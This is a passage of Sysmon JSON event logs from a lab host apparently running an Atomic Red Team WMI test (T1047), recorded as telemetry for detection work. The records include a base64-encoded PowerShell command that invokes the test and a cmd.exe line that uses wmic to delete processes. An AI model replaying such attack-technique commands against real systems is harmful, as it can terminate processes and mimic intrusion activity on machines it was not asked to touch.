C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+3af3f|C:\\Windows\\SYSTEM32\\framedynos.dll+20173|C:\\Windows\\SYSTEM32\\framedynos.dll+20f44|C:\\Windows\\system32\\wbem\\wmiprvse.exe+183d3|C:\\Windows\\system32\\wbem\\wmiprvse.exe+351a5|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-00107FD70800}","TargetProcessId":"4508","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+3af3f|C:\\Windows\\SYSTEM32\\framedynos.dll+20173|C:\\Windows\\SYSTEM32\\framedynos.dll+20f44|C:\\Windows\\system32\\wbem\\wmiprvse.exe+183d3|C:\\Windows\\system32\\wbem\\wmiprvse.exe+351a5|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5841,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010CDDD0800}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Windows\\system32\\notepad.exe\r\nGrantedAccess: 0x1\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+3af3f|C:\\Windows\\SYSTEM32\\framedynos.dll+20173|C:\\Windows\\SYSTEM32\\framedynos.dll+20f44|C:\\Windows\\system32\\wbem\\wmiprvse.exe+183d3|C:\\Windows\\system32\\wbem\\wmiprvse.exe+351a5|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010CDDD0800}","TargetProcessId":"4620","TargetImage":"C:\\Windows\\system32\\notepad.exe","GrantedAccess":"0x1","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+3af3f|C:\\Windows\\SYSTEM32\\framedynos.dll+20173|C:\\Windows\\SYSTEM32\\framedynos.dll+20f44|C:\\Windows\\system32\\wbem\\wmiprvse.exe+183d3|C:\\Windows\\system32\\wbem\\wmiprvse.exe+351a5|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.531\r\nProcessGuid: {41C8662E-20D9-5F25-0000-001066360900}\r\nProcessId: 1428\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process where name='notepad.exe' delete >nul 2>&1\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.531","ProcessGuid":"{41C8662E-20D9-5F25-0000-001066360900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process where name='notepad.exe' delete &gt;nul 2&gt;&amp;1\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-001066360900}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-001066360900}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-001066360900}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-001066360900}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 